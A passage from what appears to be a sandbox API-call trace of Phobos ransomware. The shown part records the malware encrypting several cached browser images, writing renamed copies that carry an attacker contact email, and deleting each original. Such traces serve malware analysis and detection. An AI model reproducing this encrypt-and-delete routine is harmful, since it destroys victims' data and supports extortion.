files\\low\\content.ie5\\yg1r61z8\\26158[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.996] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.996] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.996] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc05f, lpOverlapped=0x0) returned 1 [0185.077] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc060, dwBufLen=0xc060 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc060) returned 1 [0185.077] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc060, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc060, lpOverlapped=0x0) returned 1 [0185.079] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0185.079] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.079] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.079] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.079] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.079] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.079] CloseHandle (hObject=0x130) returned 1 [0185.079] CloseHandle (hObject=0xb8) returned 1 [0185.079] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\26158[1].png")) returned 1 [0185.080] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa42x3v[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.081] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=995) returned 1 [0185.081] CloseHandle (hObject=0xb8) returned 1 [0185.081] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa42x3v[1].png")) returned 0x2020 [0185.081] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa42x3v[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa42x3v[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.081] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.081] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa42x3v[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.102] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.102] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.102] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3e3, lpOverlapped=0x0) returned 1 [0185.111] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3f0, dwBufLen=0x3f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3f0) returned 1 [0185.111] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3f0, lpOverlapped=0x0) returned 1 [0185.112] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0185.112] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.112] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.112] CryptDestroyKey (hKey=0xa328a8) returned 1 [0185.112] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.112] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.112] CloseHandle (hObject=0xb8) returned 1 [0185.112] CloseHandle (hObject=0x130) returned 1 [0185.113] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa42x3v[1].png")) returned 1 [0185.113] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa58nqj[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.114] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=464) returned 1 [0185.116] CloseHandle (hObject=0x130) returned 1 [0185.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa58nqj[1].png")) returned 0x2020 [0185.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa58nqj[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa58nqj[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.116] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.116] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa58nqj[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.117] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.117] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.117] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1d0, lpOverlapped=0x0) returned 1 [0185.126] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1e0) returned 1 [0185.126] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1e0, lpOverlapped=0x0) returned 1 [0185.127] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa328a8) returned 1 [0185.127] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.127] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.127] CryptDestroyKey (hKey=0xa328a8) returned 1 [0185.127] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.127] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.127] CloseHandle (hObject=0x130) returned 1 [0185.127] CloseHandle (hObject=0xb8) returned 1 [0185.128] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa58nqj[1].png")) returned 1 [0185.128] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa61ofl[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.129] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=452) returned 1 [0185.129] CloseHandle (hObject=0xb8) returned 1 [0185.129] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa61ofl[1].png")) returned 0x2020 [0185.129] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa61ofl[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa61ofl[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.129] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.129] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa61ofl[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.130] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.130] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.130] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1c4, lpOverlapped=0x0) returned 1 [0185.149] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d0) returned 1 [0185.149] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1d0, lpOverlapped=0x0) returned 1 [0185.150] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0185.150] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.150] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.150] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.150] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.150] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.151] CloseHandle (hObject=0xb8) returned 1 [0185.151] CloseHandle (hObject=0x130) returned 1 [0185.151] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aa61ofl[1].png")) returned 1 [0185.151] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1vhm[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.152] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=414) returned 1 [0185.152] CloseHandle (hObject=0x130) returned 1 [0185.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1vhm[1].png")) returned 0x2020 [0185.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1vhm[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1vhm[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.153] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.153] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1vhm[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.153] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.153] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.153] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x19e, lpOverlapped=0x0) returned 1 [0185.163] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1a0) returned 1 [0185.163] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1a0, lpOverlapped=0x0) returned 1 [0185.165] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0185.165] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.165] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.165] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0185.165] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.165] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.165] CloseHandle (hObject=0x130) returned 1 [0185.165] CloseHandle (hObject=0xb8) returned 1 [0185.165] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aaa1vhm[1].png")) returned 1 [0185.166] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\aamin0z[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 